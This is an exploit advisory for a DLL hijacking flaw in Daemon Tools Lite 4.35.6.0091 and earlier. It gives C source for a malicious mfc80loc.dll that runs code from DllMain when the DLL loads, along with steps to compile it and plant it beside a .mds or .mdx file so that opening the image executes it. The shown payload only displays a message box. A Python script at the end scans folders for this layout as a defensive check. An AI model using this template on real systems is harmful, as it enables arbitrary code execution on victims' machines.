Daemon Tools Lite versions 4.35.6.0091 and below mfc80loc.dll DLL hijacking exploit.
77ef249904bd3ac9c7b90e298e229746
/*
Daemon Tools Lite <= 4.35.6.0091 mfc80loc.dll DLL Hijacking Exploit
Found by: Christian Heinrich (cmlh)
Exploit by: Christian Heinrich (cmlh)
Email: christianheinrich@live.com
Web: http://www.twitter.com/cmlh
Summary: Daemon Tools is a disk image mounting application for Microsoft Windows.
Description: Daemon Tools suffers from a DLL hijacking vulnerability
that enables the attacker to execute arbitrary code on a local
level through the .MDS and .MDX extensions.
----
Howto:
gcc -shared -o mfc80loc.dll daemontoolsexploit.c
Compile this file and rename to mfc80loc.dll
Then create an empty file named anything.mds or anything.mdx, or you can create
a legitimate image.
Double-clicking the .mds/.mdx file with the mfc80loc.dll file in the same folder will execute
our code.
----
Tested on Microsoft Windows 7 / XP sp 3
Vulnerability discovered by Christian Heinrich (cmlh)
christianheinrich@live.com
27.08.2010
*/
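#include <windows.h>

/* Forward declaration so DllMain can call the function defined below. */
int dll_mll(void);

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
            /* Runs when the process loads the DLL. */
            dll_mll();
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

/* Proof of concept: show a message box to demonstrate that the code ran. */
int dll_mll(void)
{
    MessageBox(0, "Hacked by cmlh !", "DLL Message", MB_OK);
    return 0;
}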
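
A defender-side check for the condition the Howto relies on (a DLL sitting in the same folder as an .mds/.mdx file), added here as an example and not part of the original advisory. It goes beyond the single file name in the advisory by also flagging any other PE-format DLL beside an image file; the function names and severity labels are assumptions.

```python
import os
import sys

IMAGE_EXTS = {".mds", ".mdx"}   # image extensions named in the advisory
NAMED_DLL = "mfc80loc.dll"      # DLL name given in the advisory


def is_pe(path):
    """True if the file starts with the 'MZ' magic of a Windows PE image."""
    try:
        with open(path, "rb") as fh:
            return fh.read(2) == b"MZ"
    except OSError:
        return False


def find_planted_dlls(root):
    """Return sorted (severity, dll_path, image_path) tuples for every folder
    under root that holds a DLL next to an .mds/.mdx file."""
    findings = []
    for folder, _dirs, files in os.walk(root):
        images = sorted(f for f in files
                        if os.path.splitext(f)[1].lower() in IMAGE_EXTS)
        if not images:
            continue
        for name in files:
            lower = name.lower()
            if not lower.endswith(".dll"):
                continue
            path = os.path.join(folder, name)
            if lower == NAMED_DLL:
                severity = "high"      # exact file name from the advisory
            elif is_pe(path):
                severity = "review"    # another loadable DLL beside an image
            else:
                continue               # .dll by name only, not a PE file
            findings.append((severity, path, os.path.join(folder, images[0])))
    return sorted(findings)


if __name__ == "__main__":
    # Pass the directory to scan as the first argument (default: current one).
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for severity, dll, image in find_planted_dlls(root):
        print(f"[{severity}] {dll} sits beside {image}")
```

Run it over download folders, extracted archives and network shares where disk images are opened from; a "high" hit is the exact layout described in the Howto.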